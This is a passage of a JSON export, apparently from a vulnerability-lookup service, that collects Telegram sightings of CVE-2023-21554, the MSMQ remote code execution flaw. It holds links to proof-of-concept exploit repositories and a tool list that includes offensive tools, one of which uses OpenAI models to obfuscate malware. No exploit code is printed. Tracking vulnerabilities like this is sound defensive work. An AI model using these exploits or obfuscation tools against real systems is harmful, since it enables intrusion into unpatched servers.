\u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 MSMQ, \u0431\u043e\u043b\u044c\u0448\u0430\u044f \u0447\u0430\u0441\u0442\u044c \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u044b \u0434\u043b\u044f CVE-2023-21554.\n\nPOC: https://github.com/omair2084/msmq_re/\n\u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438: \u041f\u0430\u0442\u0447 \u0443\u0436\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d, \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c\u0441\u044f \u0434\u043e \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0439 \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438.\n\n#CVE-2023-21554 #RCE #MSMQ", "creation_timestamp": "2023-05-03T21:31:56.000000Z"}, {"uuid": "32f8d91a-bcbb-43e8-b0d1-e61a8df8d46a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/arvinclub1/15", "content": "vulnerabilities in Microsoft Message Queuing (MSMQ)\nCVE-2023-21554\nhttps://research.checkpoint.com/2023/queuejumper-critical-unauthorized-rce-vulnerability-in-msmq-service", "creation_timestamp": "2023-04-11T21:23:37.000000Z"}, {"uuid": "d25eb3b2-6c81-4d60-9c8c-3855b7488c27", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "seen", "source": "https://t.me/ctinow/105567", "content": "CVE-2023-21554 \u2013 Hunt For MSMQ QueueJumper In The Environment\n\nhttps://ift.tt/EmkxzFB", "creation_timestamp": "2023-04-13T16:40:20.000000Z"}, {"uuid": "df48b49c-6cea-461f-80b1-698bcbc5ee7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "Telegram/wqQyoLxmelLnJNF0GCepwyWKeo0-i9JOeIzU9jIvCkiSB7Q", "content": "", "creation_timestamp": "2025-03-31T17:00:08.000000Z"}, {"uuid": "e787bfbf-e2c0-4f15-9d78-7f462c80d35f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "seen", "source": "https://t.me/breachdetector/330080", "content": "{\n  \"Source\": \"https://www.turkhackteam.org/\",\n  \"Content\": \"CVE-2023-21554: What is MSMQ? (Comprehensive)\", \n  \"author\": \" ('BARBAROS)\",\n  \"Detection Date\": \"04 Sep 2023\",\n  \"Type\": \"Data leak\"\n}\n\ud83d\udd39 t.me/breachdetector \ud83d\udd39", "creation_timestamp": "2023-09-04T00:17:28.000000Z"}, {"uuid": "2e1f70c8-89e9-4030-a665-09d46097d732", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3040", "content": "Tools - Hackers Factory \n\n\u200b\u200bInvoke-GPTObfuscation\n\nA PowerShell Obfuscator that utilizes OpenAI (and other APIs) to obfuscate your PowerShell penetration testing code, malware, or any other sensitive script.\n\nhttps://github.com/hwvs/Invoke-GPTObfuscation\n\n#infosec \n\n\u200b\u200bSubreconGTP\n\nThis (VERY BETA) Python script performs AI-assisted subdomain discovery. It takes a list of subdomains as input, generates similar subdomains using the OpenAI GPT-3 model, and attempts to resolve these subdomains.\n\nhttps://github.com/jhaddix/SubreconGTP\n\n#infosec #pentesting #bugbounty\n\nHarden Windows Safely \n\nSecurely using Official Supported Microsoft methods with proper explanation | Always up-to-date and works with the latest build of Windows.\n\nhttps://github.com/HotCakeX/Harden-Windows-Security\n\n#cybersecurity #infosec\n\n\u200b\u200bxurlfind3r\n\nA CLI utility to find domain's known URLs passively from AlienVault's Open Threat Exchange, Common Crawl, Github, Intelligence X, URLScan, and the Wayback Machine.\n\nhttps://github.com/hueristiq/xurlfind3r\n\n#infosec #pentesting #bugbounty\n\n\u200b\u200bCVE-2023-21554\n\nPoC CVE-2023-21554 Windows MessageQueuing.\n\nhttps://github.com/zoemurmure/CVE-2023-21554-PoC\n\n#cve #poc #infosec\n\n\u200b\u200bLoki\n\nSimple IOC and YARA Scanner.\n\nhttps://github.com/Neo23x0/Loki\n\n#cybersecurity #infosec #malware\n\n\u200b\u200bPeExports\n\nThis simple multithreaded tool is for collecting PE exports to help with API hashing when reverse engineering.\n\nhttps://github.com/c3rb3ru5d3d53c/peexports\n\n#cybersecurity #infosec\n\n\u200b\u200bNoCrypt AntiRansomware Linux\n\nTool to prevent #ransomware attacks on Linux systems. The module hooks the system call\u00a0sys_rename\u00a0using ftrace to monitor all the files renamed on the system.\n\nhttps://github.com/niveb/NoCrypt\n\n#cybersecurity #infosec #ransom\n\n\u200b\u200bFnord\n\nFnord is a pattern extractor for obfuscated code.\n\nhttps://github.com/Neo23x0/Fnord\n\n#cybersecurity #infosec\n\n\u200b\u200bCritical Sandbox Escape Vulnerability in VM2\n\nA sandbox escape vulnerability exists in vm2 for versions up to 3.9.17. It abuses an unexpected creation of a host object based on the specification of Proxy, and allows RCE via Function in the host context.\n\nhttps://gist.github.com/arkark/e9f5cf5782dec8321095be3e52acf5ac\n\n#cybersecurity #infosec #poc\n\n\u200b\u200bCFG-FindHiddenShellcode\n\nWalks the CFG bitmap to find previously executable but currently hidden shellcode regions.\n\nhttps://github.com/jdu2600/CFG-FindHiddenShellcode\n\n#cybersecurity #infosec\n\n\u200b\u200bADCSKiller\n\nA Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure.\n\nhttps://github.com/grimlockx/ADCSKiller\n\n#infosec #pentesting #redteam\n\n\u200b\u200bNavi | An SSG Community Project\n\nNavi is an interface for CLI AI programs built on 'Echo-AI' to bring together a purpose built cybersecurity #AI.\n\nhttps://github.com/SSGorg/Navi\n\n#cybersecurity #infosec\n\n\u200b\u200bCybersecurity-Books\n\nHere you will get awesome collection of mostly all well-known and usefull cybersecurity books from beginner level to expert for all cybersecurity positions.\n\nhttps://github.com/zealraj/Cybersecurity-Books\n\n#cybersecurity #infosec\n\n\u200b\u200bThreatHunting-Keywords\n\nThis List can be valuable for ThreatHunters, SOC and CERT teams for static analysis on SIEM as it assists in identifying threat actors (or redteamers \ud83d\ude06) using default configurations from renowned exploitation tools in logs. It differs from IOC feeds in its enduring relevance: the keywords here have no 'expiration dates' and can detect threats years after their inclusion, they are flexible accepting wildcard and non sensitive case matches and only focused on default keywords.\n\nhttps://github.com/mthcht/ThreatHunting-Keywords\n\n#infosec #pentesting #redteam\n\n\u200b\u200bPywerView\n\nEasy to find vulnerable machines, or list what domain users were added to the local Administrators group of a machine, and much more.\n\nhttps://github.com/the-useless-one/pywerview\n\n#infosec #pentesting #redteam\n\n\u200b\u200bhttps://t.me/dilagrafie\nhttps://t.me/HackerFactory", "creation_timestamp": "2023-05-22T14:01:30.000000Z"}, {"uuid": "7ca9439e-7326-4661-8e95-62954a7a3aaf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/1537", "content": "CVE-2023-21554\nwin message  \u043f\u043e\u0434\u044a\u0435\u0445\u0430\u043b\u0438\nPOC\n\n#win #poc", "creation_timestamp": "2023-05-19T13:10:13.000000Z"}, {"uuid": "71b685c5-54af-40e4-90ac-6f086eb25f0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/1478", "content": "CVE-2023-21554\n\u041d\u0443\u0436\u043d\u043e \u0442\u043e\u043b\u044c\u043a\u043e \u043f\u0430\u043a\u0435\u0442\u0438\u043a \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u044c \u043d\u0430 MSMQ-\u0441\u0435\u0440\u0432\u0435\u0440 (\u0434\u0430, \u043e\u043d   \u0434\u043e\u043b\u0436\u0435\u043d \u0431\u044b\u0442\u044c \u0432\u043a\u043b\u044e\u0447\u0435\u043d) \u0438 \u043c\u043e\u0436\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c remote command\nPOC \u041f\u0430\u043a\u0435\u0442\u0438\u043a\n\n#windows", "creation_timestamp": "2023-05-02T11:23:25.000000Z"}, {"uuid": "b8a59a49-bcac-4fe2-8b81-2a08f63ffa0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "seen", "source": "https://t.me/breachdetector/327402", "content": "{\n  \"Source\": \"https://www.turkhackteam.org/\",\n  \"Content\": \"CVE-2023-21554: MSMQ Nedir ? (Geni\u015f Kapsaml\u0131)\", \n  \"author\": \" ('BARBAROS)\",\n  \"Detection Date\": \"31 Aug 2023\",\n  \"Type\": \"Data leak\"\n}\n\ud83d\udd39 t.me/breachdetector \ud83d\udd39", "creation_timestamp": "2023-08-31T11:47:59.000000Z"}, {"uuid": "8715f283-7249-4255-a299-1c07fc3f5955", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "Telegram/cR8wu-BOUm9IhkjBcawrMcWgWqAecxY5zIb1phwyqakf-Jc", "content": "", "creation_timestamp": "2023-05-28T15:02:00.000000Z"}, {"uuid": "587a54bb-c6e8-4022-b354-67a2dc442925", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/RespaldoHackingTeam/856", "content": "CVE-2023-21554: busque MSMQ QueueJumper en el entorno: investigaci\u00f3n de seguridad\nhttps://www.socinvestigation.com/cve-2023-21554-hunt-for-msmq-queuejumper-in-the-environment/", "creation_timestamp": "2023-04-14T05:53:02.000000Z"}, {"uuid": "5e70ace4-baab-459c-8ae0-52520b68445d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "seen", "source": "Telegram/gejFY3ElMilBssDwc1BD5BhkwcUSGiEjq7v0IREe0G5rVwQ", "content": "", "creation_timestamp": "2023-11-07T15:21:48.000000Z"}, {"uuid": "a6c7cf55-757f-4713-8e40-62acaca7505d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "seen", "source": "Telegram/95lBncFMT506qQfHU4U37SSPP7ovHw6YCW80XkCboWaqbls", "content": "", "creation_timestamp": "2023-11-07T15:21:21.000000Z"}, {"uuid": "191d9af6-0d76-4e1f-8d8d-51e7f114f121", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "seen", "source": "Telegram/yKJ96vq1FsF1EOMPDUo9o6DnZ2JWujcOpmMAVe5roFBOHgU", "content": "", "creation_timestamp": "2023-07-11T21:27:25.000000Z"}, {"uuid": "77ef1861-99c9-4e3b-b9b8-9a01b7484aa3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "Telegram/artdXOYpoMtx65AtapuDVVsdO4HZD4JD5CRcaIZICbRvf7o", "content": "", "creation_timestamp": "2023-05-24T00:55:15.000000Z"}, {"uuid": "d8ac085d-1c88-45e8-89ae-5958ec326dbc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "exploited", "source": "https://t.me/true_secator/4284", "content": "\u0411\u043e\u043b\u0435\u0435 360 000 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0432 \u0441\u0435\u0442\u0438 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u0441 \u0437\u0430\u043f\u0443\u0449\u0435\u043d\u043d\u043e\u0439 \u0441\u043b\u0443\u0436\u0431\u043e\u0439 Windows Message Queuing (MSMQ) \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u044b \u0434\u043b\u044f \u0430\u0442\u0430\u043a, \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u043d\u044b\u0445 \u043d\u0430 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0443\u044e  CVE-2023-21554, \u043a\u043e\u0442\u043e\u0440\u0443\u044e Microsoft \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u043b\u0430 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u043c PAtchTuesday \u043d\u0430\u0440\u044f\u0434\u0443 \u0441 \u0441\u043e\u0442\u043d\u0435\u0439 \u0434\u0440\u0443\u0433\u0438\u0445.\n\n\u041e\u0431 \u043e\u0448\u0438\u0431\u043a\u0435 \u0441\u043e\u043e\u0431\u0449\u0438\u043b\u0438 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0423\u044d\u0439\u043d \u041b\u043e\u0443 \u0438\u0437 FortiGuard Lab \u0438 \u0425\u0430\u0439\u0444\u0435\u0439 \u041b\u0438 \u0438\u0437 Check Point Research.\n\n\u041e\u043d\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0435\u0430\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0434\u043e\u0431\u0438\u0442\u044c\u0441\u044f RCE \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u0445 Windows, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u043f\u0430\u043a\u0435\u0442\u044b MSMQ \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 \u043d\u0438\u0437\u043a\u043e\u0439 \u0441\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u0431\u0435\u0437 \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u0441 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c.\n\n\u0417\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0432\u0441\u0435 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u043c\u044b\u0435 \u0432\u044b\u043f\u0443\u0441\u043a\u0438 \u0441\u0435\u0440\u0432\u0435\u0440\u043d\u044b\u0445 \u0438 \u043a\u043b\u0438\u0435\u043d\u0442\u0441\u043a\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u0439 Windows.\n\n\u0423\u0447\u0438\u0442\u044b\u0432\u0430\u044f \u044d\u0442\u043e, \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c, \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u043d\u0430\u043c\u043d\u043e\u0433\u043e \u0431\u043e\u043b\u044c\u0448\u0435, \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u0435\u0441\u043b\u0438 \u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0442\u044c \u0432\u043e \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435, \u0447\u0442\u043e \u0441\u043b\u0443\u0436\u0431\u0430 MSMQ \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0438 \u043d\u0430 \u043d\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0447\u0435\u0440\u0435\u0437 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442 \u043c\u0430\u0448\u0438\u043d\u0430\u0445.\n\n\u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0445\u043e\u0442\u044f \u0438 MSMQ \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043d\u0435\u043e\u0431\u044f\u0437\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u043c \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u043e\u043c Windows, \u043e\u043d\u0430 \u043e\u0431\u044b\u0447\u043d\u043e \u0432\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u0432 \u0444\u043e\u043d\u043e\u0432\u043e\u043c \u0440\u0435\u0436\u0438\u043c\u0435 \u043f\u0440\u0438 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0435 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0445 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439 \u0438 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442 \u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c \u0434\u0430\u0436\u0435 \u043f\u043e\u0441\u043b\u0435 \u0443\u0434\u0430\u043b\u0435\u043d\u0438\u044f \u041f\u041e \u0441\u043e \u0432\u0441\u0435\u043c\u0438 \u0432\u044b\u0442\u0435\u043a\u0430\u044e\u0449\u0438\u043c\u0438 \u043f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u044f\u043c\u0438.\n\n\u041a \u043f\u0440\u0438\u043c\u0435\u0440\u0443, \u0432 \u0441\u043b\u0443\u0447\u0430\u0435 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 Exchange Server.\n\n\u041d\u0430 \u0444\u043e\u043d\u0435 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0435\u0433\u043e \u043e\u043f\u044b\u0442\u0430 \u0430\u0442\u0430\u043a \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u044d\u0442\u043e\u0433\u043e \u0442\u0438\u043f\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a \u043f\u043e\u043c\u0435\u0442\u0438\u043b CVE-2023-21554 \u0442\u0435\u0433\u043e\u043c \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438. \u0422\u0435\u043c \u0432\u0440\u0435\u043c\u0435\u043d\u0435\u043c, GreyNoise \u0443\u0436\u0435 \u0444\u0438\u043a\u0441\u0438\u0440\u0443\u0435\u0442 \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u0441 Windows MSMQ.\n\nMicrosoft \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u0435\u0442 \u0438 \u0441\u043e\u0432\u0435\u0442\u0443\u0435\u0442 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043d\u0435 \u043c\u043e\u0433\u0443\u0442 \u0440\u0430\u0437\u0432\u0435\u0440\u043d\u0443\u0442\u044c \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435, \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u0441\u043b\u0443\u0436\u0431\u0443 Windows MSMQ (\u0435\u0441\u043b\u0438 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e) \u0434\u043b\u044f \u0438\u0441\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f \u0432\u0435\u043a\u0442\u043e\u0440\u0430 \u0430\u0442\u0430\u043a\u0438.\n\n\u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0446\u0435\u043b\u0435\u0441\u043e\u043e\u0431\u0440\u0430\u0437\u043d\u043e  \u0437\u0430\u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f 1801/TCP \u0438\u0437 \u043d\u0435\u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0445 \u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u043e\u0432 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043f\u0440\u0430\u0432\u0438\u043b \u0431\u0440\u0430\u043d\u0434\u043c\u0430\u0443\u044d\u0440\u0430.", "creation_timestamp": "2023-04-13T16:20:05.000000Z"}, {"uuid": "6994a04b-ab89-4140-9451-fd90b4cba95b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/MrVGunz/1067", "content": "CVE-2023-21554: \u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 \u062f\u0631 \u0635\u0641 \u067e\u06cc\u0627\u0645 Microsoft\nPOC: https://github.com/zoemurmure/CVE-2023-21554-PoC\nPOC: https://github.com/3tternp/CVE-2023-21554\nMSRC: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21554\n\nCVE-2023-21554 : Microsoft Message Queuing Remote Code Execution\nPOC : https://github.com/zoemurmure/CVE-2023-21554-PoC\nPOC : https://github.com/3tternp/CVE-2023-21554\nMSRC : https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21554", "creation_timestamp": "2024-05-05T12:33:37.000000Z"}, {"uuid": "c29d8317-6af1-40c2-90fc-c4bd887a6d5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/jokerplstaeen/17317", "content": "\u200b\u200bCVE-2023-21554\n\nPoC CVE-2023-21554 Windows MessageQueuing.\n\nhttps://github.com/zoemurmure/CVE-2023-21554-PoC\n\n#cve #poc #infosec", "creation_timestamp": "2023-05-23T17:57:17.000000Z"}, {"uuid": "0857497b-14be-471b-bacc-facde931ef0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/reverse_dungeon/3101", "content": "Windows Message Queuing RCE, CVE-2023-21554:\nhttps://www.zoemurmure.top/posts/cve_2023_21554/\nPoC: https://github.com/zoemurmure/CVE-2023-21554-PoC", "creation_timestamp": "2023-05-22T18:00:17.000000Z"}, {"uuid": "e77d2983-82f4-44fc-98c8-77255b056fca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "published-proof-of-concept", "source": "https://t.me/crackcodes/3523", "content": "CVE-2023-21554 Windows MessageQueuing PoC\n\nDownload", "creation_timestamp": "2023-05-19T17:11:51.000000Z"}, {"uuid": "60b720c5-9fe3-4b8a-b0ce-127f8883fd95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-21554", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/8177", "content": "#exploit\n1. CVE-2023-1671:\nPre-Auth RCE in Sophos Web Appliance\nhttps://vulncheck.com/blog/cve-2023-1671-analysis\n]-> https://github.com/W01fh4cker/CVE-2023-1671-POC\n\n2. CVE-2022-29844:\nBuffer Overflow On WD My Cloud Pro Series PR4100\nhttps://www.zerodayinitiative.com/blog/2023/4/19/cve-2022-29844-a-classic-buffer-overflow-on-the-western-digital-my-cloud-pro-series-pr4100\n\n3. CVE-2023-21554:\nUnauthenticated RCE vulnerability in the MSMQ service\nhttps://www.randori.com/blog/vulnerability-analysis-queuejumper-cve-2023-21554", "creation_timestamp": "2024-07-17T00:33:01.000000Z"}]}